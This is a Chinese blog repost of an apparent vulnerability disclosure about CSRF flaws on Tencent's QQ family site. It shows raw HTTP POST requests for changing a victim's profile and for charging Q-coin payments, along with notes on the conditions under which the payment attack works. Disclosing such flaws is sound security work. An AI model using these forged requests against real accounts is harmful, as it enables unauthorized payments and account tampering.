首页 技术 正文

腾讯QQ家族任意支付QB+修改资料csrf

技术 2022年11月12日
0 收藏 986 点赞 3,600 浏览 1287 个字

http://jz.qq.com/m_card.shtml

腾讯QQ家族任意支付QB+修改资料csrf

POST /cgi-bin/league_change_userinfo HTTP/1.1

Host: jz.qq.com

Connection: keep-alive

Content-Length: 171

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Origin: http://jz.qq.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://jz.qq.com/inc/m_card.shtml

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

腾讯QQ家族任意支付QB+修改资料csrf

mobile=13800138000&email=y0umer%40sina.com&nation=1&province=1&city=1&signature=%CE%D2%B2%BB%B8%F6%D0%D4&introduce=%D0%A3%B3%A4&security=1&isaccept=1&image.x=38&image.y=16

腾讯QQ家族任意支付QB+修改资料csrf

腾讯QQ家族任意支付QB+修改资料csrf

腾讯QQ家族任意支付QB+修改资料csrf

还有可以csrf劫持创建家族.. 修改家族..

随意加入家族..

腾讯QQ家族任意支付QB+修改资料csrf

据说还可以随意挥霍QB..

任意支付漏洞:

POST /cgi-bin/league_month_pay HTTP/1.1

Host: jz.qq.com

Connection: keep-alive

Content-Length: 46

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Origin: http://jz.qq.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://jz.qq.com/cgi-bin/league_month_show?leagueid=716740

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

腾讯QQ家族任意支付QB+修改资料csrf

Month 就相当于支付几QB, 1是一月  1月2qb..

腾讯QQ家族任意支付QB+修改资料csrf

利用说明:任意支付只是面向没有设置QB支付验证的号码,并且加入了家族才能支付成功(因此比较鸡肋)

点赞 986

贡献者

上一篇: c++ windows下计时
下一篇: 利用flask将opencv实时视频流输出到浏览器
相关推荐
python开发_常用的python模块及安装方法
python开发_常用的python模块及安装方法
adodb:我们领导推荐的数据库连接组件bsddb3:BerkeleyDB的连接组件Cheetah-1.0:我比较喜欢这个版本的cheeta…
技术
日期:2022-11-24 点赞:878 阅读:9,492
Educational Codeforces Round 11 C. Hard Process 二分
Educational Codeforces Round 11 C. Hard Process 二分
C. Hard Process题目连接:http://www.codeforces.com/contest/660/problem/CDes…
技术
日期:2022-11-24 点赞:807 阅读:5,907
下载Ubuntn 17.04 内核源代码
下载Ubuntn 17.04 内核源代码
zengkefu@server1:/usr/src$ uname -aLinux server1 4.10.0-19-generic #21…
技术
日期:2022-11-24 点赞:569 阅读:6,740
可用Active Desktop Calendar V7.86 注册码序列号
可用Active Desktop Calendar V7.86 注册码序列号
可用Active Desktop Calendar V7.86 注册码序列号Name: www.greendown.cn Code: &nb…
技术
日期:2022-11-24 点赞:733 阅读:6,495
Android调用系统相机、自定义相机、处理大图片
Android调用系统相机、自定义相机、处理大图片
Android调用系统相机和自定义相机实例本博文主要是介绍了android上使用相机进行拍照并显示的两种方式,并且由于涉及到要把拍到的照片显…
技术
日期:2022-11-24 点赞:512 阅读:8,132
Struts的使用
Struts的使用
一、Struts2的获取  Struts的官方网站为:http://struts.apache.org/  下载完Struts2的jar包,…
技术
日期:2022-11-24 点赞:671 阅读:5,297
Lomu

贡献者

这家伙很懒,只想把你留下。

文章
24
收藏
0
人气
74,993
粉丝
进主页
文章展示
  • [ 技术 ] python开发_常用的python模块及安装方法
  • [ 技术 ] Educational Codeforces Round 11 C. Hard Process 二分
  • [ 技术 ] 下载Ubuntn 17.04 内核源代码
  • [ 技术 ] 可用Active Desktop Calendar V7.86 注册码序列号
  • [ 技术 ] Android调用系统相机、自定义相机、处理大图片
  • [ 技术 ] Struts的使用
    • 个人收藏笔记记录
    我的笔记
    首页 首页 菜单 首页 首页